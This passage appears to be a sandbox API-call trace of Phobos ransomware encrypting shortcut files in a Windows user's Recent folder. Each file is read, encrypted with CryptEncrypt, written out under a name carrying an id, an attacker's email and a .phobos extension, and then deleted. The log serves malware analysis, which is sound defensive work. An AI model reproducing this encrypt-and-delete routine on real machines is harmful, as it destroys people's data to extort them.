HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.689] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.689] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1484, lpOverlapped=0x0) returned 1 [0201.690] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1490, dwBufLen=0x1490 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1490) returned 1 [0201.690] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1490, lpOverlapped=0x0) returned 1 [0201.691] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.691] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.691] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.691] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.691] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.691] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.691] CloseHandle (hObject=0x174) returned 1 [0201.691] CloseHandle (hObject=0xfc) returned 1 [0201.692] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk")) returned 1 [0201.692] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.693] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2637) returned 1 [0201.693] CloseHandle (hObject=0xfc) returned 1 [0201.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk")) returned 0x20 [0201.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.694] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.694] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.694] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.694] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.695] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa4d, lpOverlapped=0x0) returned 1 [0201.740] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa50, dwBufLen=0xa50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa50) returned 1 [0201.740] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa50, lpOverlapped=0x0) returned 1 [0201.741] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.741] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.741] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.741] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.741] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.741] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.741] CloseHandle (hObject=0xfc) returned 1 [0201.742] CloseHandle (hObject=0x174) returned 1 [0201.742] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YMfOX888Olkz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymfox888olkz.lnk")) returned 1 [0201.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.743] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6379) returned 1 [0201.743] CloseHandle (hObject=0x174) returned 1 [0201.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk")) returned 0x20 [0201.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.744] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.744] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.745] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.745] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18eb, lpOverlapped=0x0) returned 1 [0201.746] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x18f0, dwBufLen=0x18f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x18f0) returned 1 [0201.746] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x18f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x18f0, lpOverlapped=0x0) returned 1 [0201.747] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.747] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.747] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.747] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.747] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.747] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.747] CloseHandle (hObject=0x174) returned 1 [0201.747] CloseHandle (hObject=0xfc) returned 1 [0201.748] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZgE5jZV_URQp-KKTf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zge5jzv_urqp-kktf.lnk")) returned 1 [0201.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.749] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3845) returned 1 [0201.749] CloseHandle (hObject=0xfc) returned 1 [0201.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk")) returned 0x20 [0201.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.750] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.750] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.751] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.751] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf05, lpOverlapped=0x0) returned 1 [0201.752] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf10, dwBufLen=0xf10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf10) returned 1 [0201.752] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf10, lpOverlapped=0x0) returned 1 [0201.753] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.753] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.753] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.753] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.753] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.753] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.753] CloseHandle (hObject=0xfc) returned 1 [0201.753] CloseHandle (hObject=0x174) returned 1 [0201.753] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zUniIF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zuniif-.lnk")) returned 1 [0201.754] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.755] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1045) returned 1 [0201.755] CloseHandle (hObject=0x174) returned 1 [0201.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk")) returned 0x20 [0201.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.756] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.756] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.756] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.757] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x415, lpOverlapped=0x0) returned 1 [0201.758] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420, dwBufLen=0x420 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420) returned 1 [0201.758] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x420, lpOverlapped=0x0) returned 1 [0201.759] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.759] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.759] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.759] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.759] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.759] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.759] CloseHandle (hObject=0x174) returned 1 [0201.759] CloseHandle (hObject=0xfc) returned 1 [0201.759] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C79B2a4_n0vfXJt6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_c79b2a4_n0vfxjt6.lnk")) returned 1 [0201.760] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.761] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5358) returned 1 [0201.761] CloseHandle (hObject=0xfc) returned 1 [0201.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk")) returned 0x20 [0201.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.761] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.762] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: 